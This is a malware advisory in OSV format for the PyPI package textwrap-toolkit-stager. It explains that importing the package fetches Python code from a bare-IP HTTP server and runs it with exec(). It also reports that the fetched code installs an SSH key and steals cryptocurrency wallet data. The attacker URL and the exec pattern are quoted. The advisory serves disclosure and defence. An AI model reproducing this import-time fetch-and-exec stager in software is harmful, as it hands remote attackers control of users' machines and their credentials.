OSV-MAL-2026-5722

Malicious code in textwrap-toolkit-stager (PyPI)

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (9fc85924d5672f7c91c2dd5e97c46cc48e3ae48084f906b7b0ba9d606c433fa4) On `import textwrap_toolkit_stager`, the package's `__init__.py` unconditionally fetches Python source from `http://194.5.152.9:8080/hacks/textwrap-toolkit/textwrap_toolkit/__init__.py` via `urllib.request.urlopen` and passes the response bytes directly to `exec(code_bytes, {"__name__": "__main__"})`. The fetch uses a bare IP over plaintext HTTP, with no version pinning, no hash verification, and errors silently swallowed. Any process that imports this package executes attacker-controlled Python code from 194.5.152.9 with the full privileges of the importing user. The package's advertised purpose ('lightweight utility for advanced text wrapping') has no implementation in the shipped code — the module's sole behavior is the remote stager. The package name itself self-describes the intent ('stager'). ## Source: kam193 (b5c75bdcf659eb0064e71470edd2140960c88803c906fcc5a4c9ec21b970e887) During import, package downloads and executes an obfuscated script. The code then adds a new authorized SSH key and reports back the IP of the current environment. After that, the code also attempts to exfiltrate cryptocurrency wallet data --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-06-textwrap-toolkit-stager Reasons (based on the campaign): - backdoor - obfuscation - Downloads and executes a remote malicious script. - crypto-related - exfiltration-crypto